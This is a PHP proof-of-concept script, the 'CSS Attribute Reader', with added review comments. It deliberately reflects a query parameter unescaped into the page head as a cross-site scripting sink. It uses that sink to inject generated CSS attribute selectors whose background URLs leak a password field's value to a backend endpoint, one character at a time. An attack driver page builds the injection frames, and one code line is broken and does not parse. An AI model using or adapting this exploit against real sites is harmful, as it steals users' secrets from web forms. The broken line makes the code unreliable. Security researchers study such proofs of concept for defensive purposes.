<?php
/***** BEGIN LICENSE BLOCK *****

CSSAR - A proof of concept of a CSS Attribute Reader

Copyright (C) 2008 Sirdarckcat

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA

***** END LICENSE BLOCK *****/

    
/*
 * Flat request dispatcher: the script branches on which query-string key or
 * POST field is present.  Every branch is order-sensitive -- header(),
 * setcookie() and session_start() are issued before any output, and the
 * HTML between `?>` and `<?php` is emitted verbatim -- so statement order
 * and template bytes are kept exactly as written.
 */

// `?source`: render this file's own source and stop.
if (isset($_GET['source'])) {
    highlight_file(__FILE__);
    exit();
}

// No query string at all: serve the landing frame.  Both the iframe and the
// RESTART link target `?logout`, which resets the step cookie and drops the
// session.
if(empty($_SERVER['QUERY_STRING'])){
?>
<html>
    <head>
        <title>CSS Attribute Reader Proof Of Concept</title>
    </head>
    <body>
        <iframe frameborder=0 name="fr" src="?logout" height="90%" width="100%"></iframe>
        <a href="?logout" target="fr"> RESTART </a>
    </body>
</html>
<?php
exit();
}

// A submitted form value is stored server-side as the "known value" the
// demo later tries to recover, then the page is reloaded (`Refresh: 0` is
// sent before any output).
if(isset($_POST['pass'])){
    session_start();
    $_SESSION['knownvalue']=$_POST['pass'];
    header("Refresh: 0");
    die();
}

// This script's own file name; every self-referencing URL below is built from it.
$file=basename(__FILE__);

// Sequencing gate for the `?css=N` requests: a client-side `step` cookie
// counts how many stylesheet steps have been served.  A request whose N is
// ahead of the counter is redirected back to itself (same query string)
// until the counter catches up; each served step then advances the cookie.
// NOTE(review): both operands of the `<` are client-supplied and compared
// with PHP's loose `<`; nothing here is validated, and the unconditional
// sleep(1) holds a worker for a second on every such request.
if(isset($_GET['css'])){
    //ensure everything is loaded in order
    sleep(1);
    if(!isset($_COOKIE['step']))
        $_COOKIE['step']=0;  // only the superglobal for this request; the real cookie is set below
    if($_COOKIE['step']<$_GET['css']){
        header("Location: ?".$_SERVER['QUERY_STRING']);
        exit();
    }
    setcookie('step',$_COOKIE['step']+1);
}

// Raw query parameters (undefined when absent): `d` selects a sub-action,
// `i` carries the character or value to record.  Neither is validated here.
$d=$_GET['d'];
$i=$_GET['i'];

// `?logout`: reset the step counter (cookie and superglobal, via the embedded
// assignment) and destroy the session.
if(isset($_GET['logout'])){
    session_start();
    setcookie('step',$_COOKIE['step']=0);
    session_destroy();
}

// `?read`: report what has been recovered so far.  Until the final value is
// present the page asks the browser to re-poll every second (`Refresh: 1`)
// and shows the partial prefix/suffix meanwhile.  Every session-held string
// goes through htmlentities() before output.  NOTE(review): on the first
// poll `value_`/`_value` may still be unset, which would raise undefined-key
// notices -- confirm against a run.
if(isset($_GET['read'])){
    session_start();
    if(!isset($_SESSION['value']))header("Refresh: 1");
    die("The value is: ".(isset($_SESSION['value'])?"<b>".htmlentities($_SESSION['value'])."</b>":htmlentities($_SESSION['value_']." ... ".$_SESSION['_value'])));
}

// `?css=N&d=reading`: emit a gzip-compressed stylesheet.  This is the probing
// mechanism of the proof of concept: each rule's selector tests one candidate
// character against the password input's `value` attribute, and its
// background url() is fetched by the browser only when the selector matches,
// so the request that reaches `?backend` tells the server which character
// matched.  Defender's note: a browser only loads this stylesheet because the
// default page below reflects `$_GET['xss']` into <head> unescaped; encoding
// that output, and sending a Content-Security-Policy that restricts
// style-src, removes the injection point this depends on.
if(isset($_GET['css'])){
    switch($d){
        case 'reading':
            session_start();
            ob_start("ob_gzhandler");
            header("Content-Type: text/css");
            // Prefix (`value_`) and suffix (`_value`) recovered so far, re-encoded as
            // CSS hex escapes: "\\0000" is the literal text `\0000`, so each byte
            // becomes `\0000XX`; chunk_split() inserts that separator after every two
            // hex digits and substr(...,0,-5) trims the trailing one.
            $value_=empty($_SESSION['value_'])?"":"\\0000".substr(chunk_split(bin2hex($_SESSION['value_']),2,"\\0000"),0,-5);
            $_value=empty($_SESSION['_value'])?"":"\\0000".substr(chunk_split(bin2hex($_SESSION['_value']),2,"\\0000"),0,-5);

            // Candidate characters 0x10..0x7f.  The loop reuses `$i`, clobbering the
            // `$_GET['i']` read above (not otherwise used in this branch).
            for($i=16;$i<=127;$i++){
                // NOTE(review): there is no operator between `$ce` and the string
                // literal, so this line does not parse; the file as shown cannot run.
                // Left exactly as found.
                $ce "\\0000".dechex($i);
                // One rule per outcome: prefix grows by a char -> `d=beg`; suffix grows
                // -> `d=end`; prefix+char+suffix is the whole value -> `d=fin`.  The
                // `+*` / `+*+*` sibling combinators need elements after the input,
                // which the empty <p/> tags in the form below appear to supply.
                // `i=%XX` is percent-encoded, so the backend receives the decoded
                // character in `$_GET['i']`.
                echo 'input[value^="'.$value_.$ce.'"]{background:url("'.$file.'?backend&d=beg&i=%'.dechex($i).'");}';
                echo 'input[value$="'.$ce.$_value.'"]+*{background:url("'.$file.'?backend&d=end&i=%'.dechex($i).'");}';
                echo 'input[value="'.$value_.$ce.$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_."%".dechex($i).$_value.'");}';
                echo "\n";
            }
            // Terminal rules for when no further character is needed: the value is
            // exactly prefix+suffix, the prefix alone, or the suffix alone.
            echo 'input[value="'.$value_.$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.$_value.'");}';
            echo 'input[value="'.$value_.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.'");}';
            echo 'input[value="'.$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$_value.'");}';
        break;
    }
}else if(isset($_GET['backend'])){
    // `?backend&d=...&i=...`: the endpoints the stylesheet's url()s request.
    // Each hit records one recovered fragment in the session and produces no
    // output of its own.  `beg` appends to the prefix, `end` prepends to the
    // suffix, `fin` stores the complete value.  `i` is taken verbatim from the
    // query string; the first `beg` hit writes to a not-yet-set session key.
    session_start();
    switch($d){
        case 'beg':
            $_SESSION['value_'].=$i;
        break;
        case 'end':
            $_SESSION['_value']=$i.$_SESSION['_value'];
        break;
        case 'fin':
            $_SESSION['value']=$i;
        break;
    }
}else if(isset($_GET['attack'])){
    // `?attack`: the driver page.  The first frame polls `?read`; the other six
    // each load the default page with `xss=<style>@import "...?css=N&d=reading&<time>"</style>`,
    // i.e. they deliver the stylesheet through the reflected parameter, one
    // frame per step N=0..5, sequenced by the step cookie above.  time() is
    // only a cache-buster.
?>
    <iframe src="?read" height="100%" frameborder=0 width="100%"></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=0%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=1%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=2%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=3%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=4%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>
    <iframe frameborder=0 src="<?php echo $file?>?xss=<style>@import %22<?php echo $file?>?css=5%26d=reading%26<?php echo time();?>%22%3B</style>"/></iframe>

<?php
}else{
    // Default page (also what the `attack` frames load).  `$_GET['xss']` is
    // echoed into <head> with no encoding -- this is the deliberate
    // reflected-XSS sink the proof of concept demonstrates; a real page would
    // htmlspecialchars() it and send a CSP.  The password input is pre-filled
    // from the session, so its `value` attribute carries the known value in
    // the served markup (attribute selectors test that attribute as served),
    // and the empty <p/> siblings give the `+*` / `+*+*` selectors elements
    // to match.
    session_start();
?>
<html>
    <head>
        <title>Start</title>
        <?php echo $_GET['xss'];?>
    </head>
    <body>
        <form method=POST action=?attack>
            Enter something here and press enter <input name="pass" type="password" maxlength=11 value="<?php echo htmlentities($_SESSION['knownvalue']); ?>"/>
            <p/><p/><p/>
        </form>
    </body>
</html>
<?php
}
?>